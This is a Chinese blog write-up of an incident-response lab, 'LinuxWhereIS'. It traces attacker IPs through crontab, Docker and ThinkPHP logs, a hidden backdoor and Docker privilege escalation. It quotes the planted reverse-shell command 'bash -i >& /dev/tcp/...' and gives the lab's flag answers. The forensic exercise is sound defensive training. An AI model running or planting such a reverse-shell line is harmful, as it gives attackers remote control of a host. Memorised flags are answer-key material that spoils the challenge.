应急响应靶机LinuxWhereIS WP

题目描述

一个风雨交加的夜晚,安服仔小唐,突然发现公司分配给自己的测试服务器不正常了,似乎有什么不对劲?

小唐为何频繁流汗?

服务器为何频繁数据外带?

24岁小唐竟然无从下手!

到底是道德的沦丧还是人性的扭曲?

敬请下载“应急响应靶机-Linux-WhereIS”!

开启环境

首先下载并打开虚拟机,账号密码为zgsf/zgsf

执行桌面的开启环境.sh

image-20250424115411906

查看ip并使用ssh连接,模拟实战环境

1. 攻击者的两个ip地址

第一个ip

cat /etc/crontab检查计划任务,发现每分钟在执行脚本

image-20250424183346470

脚本内容为反弹shell

bash -i >& /dev/tcp/192.168.31.64/1133 0<& 2>&1

故第一个攻击者ip

192.168.31.64

第二个ip

查看docker容器,并进入排查

sudo docker exec -it 1d1 sh

在thinkphp日志中发现第二个攻击者ip,疑似利用thinkphp5 RCE漏洞CNVD-2018-24942

cat /app/runtime/log/202503/22.log

image-20250424190218271

192.168.31.251

2. flag1和flag2

flag1

在/home目录下的.system文件发现flag1

cat /home/.system

SYS{ZGSFYYDSadmin}

flag2

在nginx的docker容器中发现flag2

sudo docker exec -it 2da bash

history

image-20250424184500319

zgsf{yerhawtigouhegih}

3. 后门程序进程名称

在home目录下发现隐藏文件夹.system_config

image-20250424183816937

疑似后门程序,查看发现system.log中有黑客ip的连接记录

image-20250424183908719

故后门进程为

systemd_null

4. 攻击者的提权方式(输入程序名称即可)

docker容是以root权限启动的,且部分docker容器已被黑客控制,故猜测提权方式为docker

docker

验证答案

image-20250424191106250

posted @ 2025-04-24 19:17  PengSoar  阅读(127)  评论(2)    收藏  举报